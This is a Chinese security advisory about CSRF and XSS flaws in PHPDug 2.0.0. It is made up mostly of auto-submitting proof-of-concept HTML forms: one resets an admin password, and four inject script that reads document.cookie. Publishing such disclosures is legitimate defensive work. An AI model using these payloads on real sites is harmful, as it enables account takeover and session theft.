栏目导航: 首页 > 安全公告 > 程序漏洞 > 内容

PHPDug CSRF/XSS等多个漏洞

www.hx99.net    时间: 2011-05-07    阅读: 次     整理: 华西安全网

漏洞说明:PHPDug 2.0.0存在跨站请求伪造漏洞(CSRF)及XSS跨站漏洞,成功利用此漏洞可能导致应用程序的一个妥协,基于cookie的认证证书,泄露或窃取敏感数据的修改。

CSRF漏洞:由于该漏洞存在于“admin/ admin_edit.php”脚本没有正确验证的HTTP请求的来源。以下测试poc:

<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="USERID">
<input type="hidden" name="username[USERID]" value="Admin">
<input type="hidden" name="password[USERID]" value="test123">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
 

XSS跨站漏洞:由于该漏洞存在于“add_story.php”,“editprofile.php”,“admin/ content_add.php”,“admin/ admin_edit.php”。以下测试poc:

1.
 
<form action="http://www.myhack58.com/add_story.php" method="post" name="main">
<input type="hidden" name="story_url" value='http://www.baidu.com/"><script>alert(document.cookie)</script>'
>
<input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
</script>
 
2.
 
<form action="http://www.myhack58.com/editprofile.php" method="post" name="main">
<input type="hidden" name="email" value='email (at) example (dot) com [email concealed]"><script>alert(document.cookie)</script>'>
<input type="hidden" name="commentst" value="-4">
<input type="hidden" name="Submit" value="Save Changes">
</form>
<script>
document.main.submit();
</script>
 
3.
 
<form action="http://www.myhack58.com/adm/content_add.php" method="post" name="main">
<input type="hidden" name="id" value="999">
<input type="hidden" name="title" value='page"><script>alert(document.cookie)</script>'>
<input type="hidden" name="contentvalue="content">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
 
4.
 
<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="1">
<input type="hidden" name="username[1]" value='admin<script>alert("XSS")</script>'>
<input type="hidden" name="password[1]" value="">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
 

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭

热门推荐

最近更新